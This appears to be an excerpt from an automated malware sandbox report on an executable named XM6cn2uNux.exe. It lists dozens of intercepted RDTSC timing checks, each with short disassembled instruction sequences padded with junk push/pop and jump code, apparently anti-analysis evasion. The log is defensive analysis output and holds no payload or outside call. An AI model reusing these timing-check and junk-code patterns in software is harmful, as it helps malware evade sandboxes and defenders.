                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 641492 second address: 641498 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AC94 second address: 64AC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AC9C second address: 64ACA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649184 second address: 649188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649188 second address: 6491BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FC57CD4ECF8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FC57CD4ECFBh 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007FC57CD4ECF6h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649C5E second address: 649C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649C67 second address: 649C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64A47A second address: 64A49B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C32Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64A49B second address: 64A4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AAF6 second address: 64AB00 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57C52C334h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652F83 second address: 652F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652A49 second address: 652A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652CD6 second address: 652CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC57CD4ECF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 661202 second address: 661208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66137D second address: 661383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 664663 second address: 664673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC57C52C347h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 664673 second address: 664690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C056 second address: 66C071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C325h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C071 second address: 66C08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC57CD4ECF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C08C second address: 66C092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 674351 second address: 67436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC57CD4ED04h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67436A second address: 67436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 674208 second address: 67420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA39 second address: 67CA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA41 second address: 67CA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA45 second address: 67CA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B537 second address: 67B53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B53D second address: 67B542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B542 second address: 67B55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57CD4ED04h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B55C second address: 67B560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6C5 second address: 67B6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6D0 second address: 67B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6D4 second address: 67B6E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B825 second address: 67B86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C329h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC57C52C328h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jo 00007FC57C52C316h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B9E8 second address: 67B9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B9F1 second address: 67B9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC57C52C316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67BB3E second address: 67BB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC57CD4ECF6h 0x0000000a jp 00007FC57CD4ECF6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 jng 00007FC57CD4ECFEh 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67BCF2 second address: 67BCF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C74D second address: 67C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C756 second address: 67C75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C75A second address: 67C763 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C763 second address: 67C77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57C52C31Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6807F8 second address: 680814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6804A8 second address: 6804E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 jmp 00007FC57C52C325h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FC57C52C31Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC57C52C31Dh 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 691836 second address: 69183C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 69183C second address: 691844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 691844 second address: 69184A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 69184A second address: 691886 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FC57C52C316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007FC57C52C326h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC57C52C326h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A26F7 second address: 6A2709 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC57CD4ECFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A2709 second address: 6A2724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FC57C52C31Fh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A2724 second address: 6A272F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A272F second address: 6A2735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A2735 second address: 6A2739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A22F6 second address: 6A22FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6A22FB second address: 6A2323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FC57CD4ED08h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FC57CD4ECF6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BCE96 second address: 6BCEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C321h 0x00000007 jnl 00007FC57C52C316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jng 00007FC57C52C316h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BCEBD second address: 6BCEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED00h 0x00000009 popad 0x0000000a ja 00007FC57CD4ECFEh 0x00000010 jne 00007FC57CD4ECF6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BC071 second address: 6BC075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BC075 second address: 6BC08B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57CD4ECF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC57CD4ECF8h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BC2E5 second address: 6BC2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BC86E second address: 6BC874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BC874 second address: 6BC89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57C52C321h 0x0000000b popad 0x0000000c jmp 00007FC57C52C31Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BCB81 second address: 6BCB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 js 00007FC57CD4ECFCh 0x0000000e jnl 00007FC57CD4ECF6h 0x00000014 push eax 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE75F second address: 6BE765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE765 second address: 6BE782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE782 second address: 6BE786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE786 second address: 6BE78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE78C second address: 6BE7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC57C52C318h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FC57C52C329h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE7B7 second address: 6BE7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE7CA second address: 6BE7EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC57C52C322h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6BE5DB second address: 6BE5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FC57CD4ECF6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C420D second address: 6C4212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C43A1 second address: 6C43AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C5D6E second address: 6C5D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C5D73 second address: 6C5D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C5D92 second address: 6C5D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C5D98 second address: 6C5D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C5D9C second address: 6C5DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7DD6 second address: 6C7DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC57CD4ECFDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7DE9 second address: 6C7E09 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC57C52C31Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a js 00007FC57C52C316h 0x00000010 jbe 00007FC57C52C318h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7E09 second address: 6C7E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7E0D second address: 6C7E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7E19 second address: 6C7E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6C7E1D second address: 6C7E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D1A5E second address: 5D1A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50D03DE second address: 50D03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50D03E2 second address: 50D03E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50D03E8 second address: 50D041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FC57C52C31Eh 0x00000011 mov ah, 44h 0x00000013 popad 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 mov bh, A7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50D041C second address: 50D043E instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC57CD4ED06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F08C8 second address: 50F08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F09FE second address: 50F0A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0A04 second address: 50F0A82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov cx, BC73h 0x00000013 pushfd 0x00000014 jmp 00007FC57C52C328h 0x00000019 or ah, 00000078h 0x0000001c jmp 00007FC57C52C31Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007FC57C52C328h 0x00000029 add cl, FFFFFFD8h 0x0000002c jmp 00007FC57C52C31Bh 0x00000031 popfd 0x00000032 popad 0x00000033 je 00007FC57C52C37Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0A82 second address: 50F0A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
